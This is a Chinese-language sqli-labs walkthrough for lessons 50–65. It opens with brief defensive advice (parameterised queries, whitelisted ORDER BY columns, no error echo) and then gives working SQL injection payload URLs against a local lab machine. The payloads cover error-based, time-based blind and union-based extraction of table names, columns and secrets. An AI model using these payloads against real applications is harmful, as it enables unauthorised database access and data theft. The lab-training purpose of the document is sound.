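Less 50-65 的题目没有新的注入方式,基本上都是前面关卡出现过的注入类型,或者是几种类型组合而成的复合型注入。老黑就不再赘述了,解释得太多,只会看低读者的智商。从防御角度看,这些关卡的修复思路是一致的:id 这类取值用参数化查询绑定;sort 这类排序参数(在 sqli-labs 中应是拼入 ORDER BY)无法绑定,应按固定白名单映射到列名;同时不要把数据库错误信息回显到页面。payload 如下所示(均针对本地 sqli-labs 靶机,Less 54 中的表名、列名应是该靶机实例生成的值,仅作示例):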
Less 50
http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
Less 51
http://192.168.162.135/sqli-libs/Less-51/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
Less 52
http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
Less 53
http://192.168.162.135/sqli-libs/Less-53/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
Less 54
http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema ='challenges' and table_name='POV9ATA70T')--+
http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,version(),database()--+
Less 55
http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
Less 56
http://192.168.162.135/sqli-libs/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
Less 57
http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
Less 58
http://192.168.162.135/sqli-libs/Less-58/?id=-1' union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
Less 59:
http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
Less 60:
http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
Less 61:
http://192.168.162.135/sqli-libs/Less-61/?id=-1')) union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
Less 62:
http://192.168.162.135/sqli-libs/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
Less 63:
http://192.168.162.135/sqli-libs/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
Less 64:
http://192.168.162.135/sqli-libs/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
Less 65:
http://192.168.162.135/sqli-libs/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+